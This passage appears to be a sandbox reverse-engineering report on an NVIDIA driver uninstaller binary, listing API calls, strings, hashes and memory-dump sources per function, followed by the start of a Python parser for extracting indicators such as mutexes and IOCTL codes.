                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetLastError.KERNEL32 ref: 0040174D
                                  • _sprintf.LIBCMT ref: 00401767
                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00401785
                                  • _sprintf.LIBCMT ref: 0040179E
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                  • LocalFree.KERNEL32(?), ref: 004017AB
                                  • MessageBoxA.USER32(?,?,?,00000000), ref: 004017C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FormatLocalMessageTime_fputs_sprintf$DebugErrorFreeLastMutexObjectOutputReleaseSingleStringWait__output_l_fprintf
                                  • String ID: %s%s$%s Error(%li)$CommandClass::ShowLastError
                                  • API String ID: 1966981115-2484366330
                                  • Opcode ID: 1d11748fcb0c4b8f9c94ad4c83002a2468fac9d83a485c68f2e19f11a2514907
                                  • Instruction ID: 98a4c66635103757f4c5d90b18bae06a0564441797562216ccfa199704bdf7c5
                                  • Opcode Fuzzy Hash: 1d11748fcb0c4b8f9c94ad4c83002a2468fac9d83a485c68f2e19f11a2514907
                                  • Instruction Fuzzy Hash: 1C11AB72300700BBD324DB54DC46FEFB7A8EB98745F40891EB645921C1EB74A554CBE6
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetPrivateProfileStringA.KERNEL32(Version,Class,(error),?,00000080,?), ref: 0040800A
                                  • GetPrivateProfileStringA.KERNEL32(Version,Provider,(error),?,00000080,?), ref: 00408029
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: String$PrivateProfileTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleWait__mbsicmp_l_fprintf
                                  • String ID: %NVidia%$(error)$Class$Display$Provider$UninstCommandClass::IsNvDisplayInf$Version
                                  • API String ID: 4135434718-2900725535
                                  • Opcode ID: 52bc5b012bbe5feeddd9a2d6ce780c4bf5da6c727d802a42b4c098c3a660292d
                                  • Instruction ID: 2ca9689c1e262c72aafdbaccc39778859b66c77a81ed6a24b5e3caec5619c15d
                                  • Opcode Fuzzy Hash: 52bc5b012bbe5feeddd9a2d6ce780c4bf5da6c727d802a42b4c098c3a660292d
                                  • Instruction Fuzzy Hash: 0211C2B5B4034067E620E766DC47FEB7694BFA4784F00443EF984621C2E6BDA448C7AE
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407BBF
                                  • CoInitialize.OLE32(00000000), ref: 00407BCA
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • CreateShortcut: invalid number of arguments, xrefs: 00407A81
                                  • UninstCommandClass::CreateShortcut, xrefs: 00407A5D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CreateDebugDirectoryFormatInitializeLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: CreateShortcut: invalid number of arguments$UninstCommandClass::CreateShortcut
                                  • API String ID: 170011988-203580069
                                  • Opcode ID: bddf0185f60c7cc371ec589080dce0e007a705512886e32c1518adc8baa15136
                                  • Instruction ID: 72563601ff5a91138ee463545765219fc5e2ffcf66d2a1534b320dc4e2e76495
                                  • Opcode Fuzzy Hash: bddf0185f60c7cc371ec589080dce0e007a705512886e32c1518adc8baa15136
                                  • Instruction Fuzzy Hash: 02716D75608301AFC310DB28D891BABB7E5AFC8314F14892DF959A7391D734F905CBA6
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00401ACA
                                  • SetLastError.KERNEL32(00000000), ref: 00401ADA
                                  • GetLastError.KERNEL32 ref: 00401AE6
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00401B1C
                                  • GetLastError.KERNEL32 ref: 00401B22
                                  • FindClose.KERNEL32(00000000), ref: 00401B2A
                                  Strings
                                  • CommandClass::EnumFiles, xrefs: 00401A77
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ErrorFindLast$FileTime_fputs$CloseDebugFirstFormatLocalMutexNextObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: CommandClass::EnumFiles
                                  • API String ID: 1221427077-876897932
                                  • Opcode ID: 17ff3337f41760794aa28b3fb4c9f9a9ec2d9cee4e987ee76e076f35f9c71f2a
                                  • Instruction ID: fac88285da1a606cb5ca6f33d8c751f1491a05cc254046272bf09f2927cffa5a
                                  • Opcode Fuzzy Hash: 17ff3337f41760794aa28b3fb4c9f9a9ec2d9cee4e987ee76e076f35f9c71f2a
                                  • Instruction Fuzzy Hash: 222174321087409FC320DB68DD95AEF7BE4AFD9305F00492DF58A97361EB349908CB96
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • LookupPrivilegeValueA.ADVAPI32 ref: 004041A4
                                  • GetCurrentProcess.KERNEL32(00000020,00000000), ref: 004041BF
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004041C6
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 004041E1
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000010,00000000,00000000), ref: 004041EB
                                  • GetLastError.KERNEL32(?,00000000,00000001,00000010,00000000,00000000), ref: 004041F1
                                  Strings
                                  • UninstCommandClass::NvEnableTokenPrivilege, xrefs: 00404183
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ProcessTimeToken_fputs$AdjustCloseCurrentDebugErrorFormatHandleLastLocalLookupMutexObjectOpenOutputPrivilegePrivilegesReleaseSingleStringValueWait_fprintf
                                  • String ID: UninstCommandClass::NvEnableTokenPrivilege
                                  • API String ID: 3092253808-3895378903
                                  • Opcode ID: 4670426cac2fe7c6c0c0196e73a97a1693be51439bb9d976c301965b203cb191
                                  • Instruction ID: 7ab7daa8431ee1f8187e6cd71065e700b29adbbce0c0792880465a7fabf7e16a
                                  • Opcode Fuzzy Hash: 4670426cac2fe7c6c0c0196e73a97a1693be51439bb9d976c301965b203cb191
                                  • Instruction Fuzzy Hash: E60144B0644301ABD310EF64CC4AF9B7BA8FB84701F14C929F591D61A0D774D94887A6
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00407769
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0040777B
                                  • Module32First.KERNEL32 ref: 00407799
                                  • CloseHandle.KERNEL32(00000000), ref: 004077BE
                                  Strings
                                  • UninstCommandClass::GetProcessModule, xrefs: 0040774E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CloseCreateDebugFirstFormatHandleLocalModule32MutexObjectOutputReleaseSingleSnapshotStringToolhelp32Wait_fprintf_memset
                                  • String ID: UninstCommandClass::GetProcessModule
                                  • API String ID: 2465373681-922176341
                                  • Opcode ID: 9718ed98a6a4c9b9e592de8180d2689cc63cc8b61b6a9219d3c4ffea88374871
                                  • Instruction ID: 09fc4999a80a099d9463567efee23382dab9352c641e14a0b91ba2d952bc89c9
                                  • Opcode Fuzzy Hash: 9718ed98a6a4c9b9e592de8180d2689cc63cc8b61b6a9219d3c4ffea88374871
                                  • Instruction Fuzzy Hash: D901CC716043006BD320EBA5DC89EAF77D8EFD8354F44092EF555932C1DB38690587AB
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0041133B
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00411350
                                  • UnhandledExceptionFilter.KERNEL32(004216C4), ref: 0041135B
                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00411377
                                  • TerminateProcess.KERNEL32(00000000), ref: 0041137E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                  • String ID:
                                  • API String ID: 2579439406-0
                                  • Opcode ID: 69d3541adcc882bf132c78f22a1bf283ce2c2708e70e8f3eea6b2b149dd52042
                                  • Instruction ID: d0e19ec7361a8797260ffc709ea3df914eb779762e176d43a2dfc101960c7177
                                  • Opcode Fuzzy Hash: 69d3541adcc882bf132c78f22a1bf283ce2c2708e70e8f3eea6b2b149dd52042
                                  • Instruction Fuzzy Hash: DE21C3B4610344DFD720DF64EE846887BB4BB08345F92507AED08962B0E7B859A78F4E
                                  APIs
                                    • Part of subcall function 00403B80: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\NVIDIA Corporation\Installer,00000000,00000001,?), ref: 00403BAD
                                    • Part of subcall function 00403B80: RegQueryValueExA.ADVAPI32 ref: 00403BE5
                                    • Part of subcall function 00403B80: _memset.LIBCMT ref: 00403BF8
                                    • Part of subcall function 00403B80: RegQueryValueExA.ADVAPI32(?,LogPath,00000000,00000000,?,?), ref: 00403C25
                                    • Part of subcall function 00403B80: PathIsRelativeA.SHLWAPI(?), ref: 00403C30
                                    • Part of subcall function 00403B80: RegCloseKey.ADVAPI32(?), ref: 00403C53
                                    • Part of subcall function 00403B80: CreateMutexA.KERNEL32(00000000,00000000,Global\NVInstallerLogFile), ref: 00403C73
                                    • Part of subcall function 00403B80: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00403C89
                                    • Part of subcall function 00403B80: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000008,NVInstallerLogSharedMemory), ref: 00403C9C
                                    • Part of subcall function 00403B80: ReleaseMutex.KERNEL32(?), ref: 00403CB1
                                    • Part of subcall function 00403B80: CloseHandle.KERNEL32(?), ref: 00403CBE
                                    • Part of subcall function 004053F0: GetVersionExA.KERNEL32(00000000), ref: 0040544C
                                  • LoadStringA.USER32(?,00000009,?,00000100), ref: 00403A98
                                  • LoadStringA.USER32(?,00000001,?,00000080), ref: 00403AAA
                                  • MessageBoxA.USER32(00000000,?,?,00000000), ref: 00403AC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseCreateLoadMutexQueryStringValue$FileHandleMappingMessageObjectOpenPathRelativeReleaseSingleVersionWait_memset
                                  • String ID: UnInstaller
                                  • API String ID: 1444618915-1707990285
                                  • Opcode ID: 42080dd58d24130139bef8cdfe76d778fd589072c7cd43c4633c4b1e23122540
                                  • Instruction ID: c85bfe5b000439fac7031c587e884d56bc3e528d9591eb6319320c9c715a2ffb
                                  • Opcode Fuzzy Hash: 42080dd58d24130139bef8cdfe76d778fd589072c7cd43c4633c4b1e23122540
                                  • Instruction Fuzzy Hash: 0A218071208240AAD224EB65DC56BEB77A8FFC4304F50852EF589971C1EFB8A504CBDA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00407CF0
                                  • DeviceIoControl.KERNEL32(00000000,00041018,00000000,00000000,?,00000008,?,00000000), ref: 00407D21
                                  • CloseHandle.KERNEL32(00000000), ref: 00407D2A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$CloseControlCreateDebugDeviceFileFormatHandleLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: GetDriveSCSIAddress
                                  • API String ID: 3234933748-527886275
                                  • Opcode ID: 71925fa279a85dda880005e78cdda1d9abb8d960348d80cdd745e99ffeb868e7
                                  • Instruction ID: 67a817007a8cea9c4c90015ff023be56a693fd8fddb7151cd6217a53b4769b84
                                  • Opcode Fuzzy Hash: 71925fa279a85dda880005e78cdda1d9abb8d960348d80cdd745e99ffeb868e7
                                  • Instruction Fuzzy Hash: 7EF090713803103AE2205B68EC0EF866798DB85B62F208526F701EA1C0C6F0690483A9
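The function entry above (CreateFileA with zero desired access, DeviceIoControl with control code 00041018 and an 8-byte output buffer, then CloseHandle) is the kind of record an analyst wants to pull out of this report mechanically rather than by eye. The following Python is an added example, not Joe Sandbox tooling and not code from the sample: it parses API lines in the layout shown on this page (assumed to be stable across entries), decodes a Windows CTL_CODE into its device-type, access, function and method fields, and collects the mutex, file-mapping, registry-key and IOCTL indicators. The sample lines are copied from the two entries above; the IOCTL name table holds values from the Windows SDK headers and covers only the three codes listed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: API lines copied from two function entries of this
# report (subcall 00403B80 and the GetDriveSCSIAddress entry at 00407CF0).
SAMPLE_LINES = """\
• Part of subcall function 00403B80: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\\NVIDIA Corporation\\Installer,00000000,00000001,?), ref: 00403BAD
• Part of subcall function 00403B80: RegQueryValueExA.ADVAPI32 ref: 00403BE5
• Part of subcall function 00403B80: CreateMutexA.KERNEL32(00000000,00000000,Global\\NVInstallerLogFile), ref: 00403C73
• Part of subcall function 00403B80: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000008,NVInstallerLogSharedMemory), ref: 00403C9C
• CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00407CF0
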